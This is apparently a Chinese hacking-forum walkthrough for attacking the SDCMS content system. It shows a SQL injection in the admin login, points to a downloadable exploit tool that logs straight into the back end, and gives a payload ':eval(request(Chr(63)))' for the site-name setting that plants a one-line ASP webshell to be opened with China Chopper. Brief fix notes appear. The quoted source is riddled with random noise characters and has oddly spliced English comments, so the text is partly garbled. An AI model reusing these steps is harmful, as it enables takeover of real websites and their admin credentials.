作者:T00LS 鬼哥
漏洞文件:后台目录/index.asp(后台登录处理过程 Sub Check)
6 k* K( Y& j0 v# L$ m5 ASub Check3 X0 |4 V( H; p8 K. m0 w
Dim username,password,code,getcode,Rs0 F+ u+ ?/ b3 @( ]4 l
IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub0 @6 Q& S9 P' c! s* X
username=FilterText(Trim(Request.Form("username")),1)" a J. y7 E# }4 Y: I1 m
password=FilterText(Trim(Request.Form("password")),1)
, R+ F. y. }* d& Z6 z3 e8 h$ ` code=Trim(Request.Form("yzm"))
: R7 D/ K$ m9 d! u getcode=Session("SDCMSCode")
, x& u J5 w; m& c* _$ v IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died
+ J, Y% ~' l; a' Y1 G! }. T/ s IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied2 E5 f6 Q( F' e4 g, r6 N
IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)" ied" w0 f) W; a9 R- L/ ~
IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)" ied
' T+ ?% G/ P7 G( x; I7 j7 ]; o IF username="" or password="" Then
1 `& F. w; p* T8 w Echo "用户名或密码不能为空" ied
' }, W1 r6 ]4 E( P9 d Else
# c% ` }* ?2 Q) t/ h# B: P Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")! V I; B0 U. N% O+ x5 D$ L
IF Rs.Eof Then
3 O) f1 G/ H' K AddLog username,GetIp,"登录失败",1
8 J B( U4 ^/ Q' x4 [ Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"
$ M( f& z6 g( f8 F% x Else: m% V4 _2 ?/ Y/ Q* u
Add_Cookies "sdcms_id",Rs(0)% X7 ? g4 n( x* L R3 H
Add_Cookies "sdcms_name",username
# R* n4 k. d7 f4 ~+ g( C Add_Cookies "sdcms_pwd",Rs(2)% W& L4 [9 V8 o9 ? G; W4 [
Add_Cookies "sdcms_admin",Rs(3)
# j) D2 ?* g8 ?: ]- i- j3 J0 L Add_Cookies "sdcms_alllever",Rs(4)
& L: a, E8 X5 Q; ?8 V+ V Add_Cookies "sdcms_infolever",Rs(5)
$ q9 e2 q: \8 f& O Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
% ]& a9 G) q- ?- [ d# o. g AddLog username,GetIp,"登录成功",1 m; `& z9 P7 r
'自动删除30天前的Log记录+ N! n8 p4 Q- I" E9 U9 l& t
IF Sdcms_DataType Then% B0 I5 x1 h: |/ u. M
Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")6 `4 p# u$ N9 v9 g2 y
Else7 t3 c* Q7 g" m
Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")
! U6 X# X9 ^2 _- E+ L# M2 B/ E End IF
7 W |# y% G5 n: } Go("sdcms_index.asp")
) k8 N0 q. s; M End IF
- X7 m* Z7 E) Q/ N0 h& x0 l1 i Rs.Close/ H4 a, M" w( T
Set Rs=Nothing2 \ z- V( b8 z! }
End IF
: V6 a( N- b! I; a5 z7 YEnd Sub
我们可以看到 username 是经 FilterText(...,1) 过滤后直接拼接进 Sd_Admin 的 Select 查询字符串的。我们看看 FilterText 的代码:
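Function FilterText(ByVal t0,ByVal t1)
    ' General-purpose input cleaner used across SDCMS. t1 selects the mode:
    '   "1"  - strip whitespace only (space, CR, LF). Quote characters and
    '          every other SQL metacharacter are kept, so the result is NOT
    '          safe to splice into a SQL string.
    '   "2"  - strip a long list of control and punctuation characters.
    '   else - HTML-entity-encode & ' " < > for output into a page.
    ' In every mode the word "expression" is broken with a soft hyphen so it
    ' cannot form a CSS expression() when echoed into a style attribute.
    ' Null, array and empty inputs yield "".
    '
    ' Fixes: VBScript does not short-circuit, so the original single
    ' condition `Len(t0)=0 Or IsNull(t0) Or IsArray(t0)` evaluated Len() on a
    ' Null or an array before the type checks could help (a Null condition
    ' does not take the branch; Len(array) is a type mismatch). The type
    ' checks now run first. The HTML entities in the encode branch, which the
    ' forum rendered as their decoded characters (turning each Replace into a
    ' no-op), are restored. The "expression" rewrite used a binary compare
    ' although the guard was case-insensitive, so "EXPRESSION" slipped
    ' through; it now uses a text compare (1) to match the guard.
    IF IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function
    IF Len(t0)=0 Then FilterText="":Exit Function
    t0=Trim(t0)
    Select Case t1
        Case "1"
            t0=Replace(t0,Chr(32),"")          ' space
            t0=Replace(t0,Chr(13),"")          ' CR
            t0=Replace(t0,Chr(10)&Chr(10),"")  ' double LF
            t0=Replace(t0,Chr(10),"")          ' LF
        Case "2"
            t0=Replace(t0,Chr(8),"")    ' backspace
            t0=Replace(t0,Chr(9),"")    ' horizontal tab
            t0=Replace(t0,Chr(10),"")   ' LF
            t0=Replace(t0,Chr(11),"")   ' vertical tab
            t0=Replace(t0,Chr(12),"")   ' form feed
            t0=Replace(t0,Chr(13),"")   ' CR
            t0=Replace(t0,Chr(22),"")   ' SYN control character
            t0=Replace(t0,Chr(32),"")   ' space
            t0=Replace(t0,Chr(33),"")   ' !
            t0=Replace(t0,Chr(34),"")   ' "
            t0=Replace(t0,Chr(35),"")   ' #
            t0=Replace(t0,Chr(36),"")   ' $
            t0=Replace(t0,Chr(37),"")   ' %
            t0=Replace(t0,Chr(38),"")   ' &
            t0=Replace(t0,Chr(39),"")   ' '
            t0=Replace(t0,Chr(40),"")   ' (
            t0=Replace(t0,Chr(41),"")   ' )
            t0=Replace(t0,Chr(42),"")   ' *
            t0=Replace(t0,Chr(43),"")   ' +
            t0=Replace(t0,Chr(44),"")   ' ,
            t0=Replace(t0,Chr(45),"")   ' -
            t0=Replace(t0,Chr(46),"")   ' .
            t0=Replace(t0,Chr(47),"")   ' /
            t0=Replace(t0,Chr(58),"")   ' :
            t0=Replace(t0,Chr(59),"")   ' ;
            t0=Replace(t0,Chr(60),"")   ' <
            t0=Replace(t0,Chr(61),"")   ' =
            t0=Replace(t0,Chr(62),"")   ' >
            t0=Replace(t0,Chr(63),"")   ' ?
            t0=Replace(t0,Chr(64),"")   ' @
            t0=Replace(t0,Chr(91),"")   ' [
            t0=Replace(t0,Chr(92),"")   ' \
            t0=Replace(t0,Chr(93),"")   ' ]
            t0=Replace(t0,Chr(94),"")   ' ^
            t0=Replace(t0,Chr(95),"")   ' _
            t0=Replace(t0,Chr(96),"")   ' `
            t0=Replace(t0,Chr(123),"")  ' {
            t0=Replace(t0,Chr(124),"")  ' |
            t0=Replace(t0,Chr(125),"")  ' }
            t0=Replace(t0,Chr(126),"")  ' ~
        Case Else
            ' & must be encoded first so the entities added below stay intact.
            t0=Replace(t0, "&", "&amp;")
            t0=Replace(t0, "'", "&#39;")
            t0=Replace(t0, """", "&quot;")
            t0=Replace(t0, "<", "&lt;")
            t0=Replace(t0, ">", "&gt;")
    End Select
    ' Chr(173) is the soft hyphen (U+00AD): invisible in a page but enough to
    ' stop the token from being parsed as a CSS expression().
    IF Instr(Lcase(t0),"expression")>0 Then
        t0=Replace(t0,"expression","e" & Chr(173) & "xpression", 1, -1, 1)
    End If
    FilterText=t0
End Function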
看到没。参数为 1 时只去掉空格(Chr(32))、回车(Chr(13))和换行(Chr(10)),单引号等 SQL 元字符原样保留,而 username 又被直接拼进了 Select 语句的 Where 条件,所以 username 参数存在 SQL 注入。
漏洞导致可以直接拿到后台帐号密码。SDCMS 默认后台地址为 /admin/,如果站长改了后台路径,那么请自行查找。修复方式:登录查询应改用带参数的 ADODB.Command(? 占位符)绑定 username 和密码哈希,而不是依赖 FilterText 模式 1——该模式本来只是去空白,并不是 SQL 转义。
- {2 a% R; W8 J. E" rEXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP
测试:
现在在工具上输入验证码,然后点 OK。
看到我们直接进入后台管理界面了,呵呵!
这样就直接进入后台了。
SDCMS 提权:
方法 1:访问 /后台目录/sdcms_set.asp,在"网站名称:"后面加上 ":eval(request(Chr(63)))' 即可直接写入一句话。该值会被写入 /inc/Const.asp,一句话连接密码是 ?(Chr(63))。从结果看,sdcms_set.asp 在把配置值写入 Const.asp 时没有对双引号做转义(具体写入代码本文未给出),因此配置项实际上是一个 ASP 源码注入点;修复应对写入的值转义双引号或拒绝含引号的输入。
OK,现在用菜刀连接一下!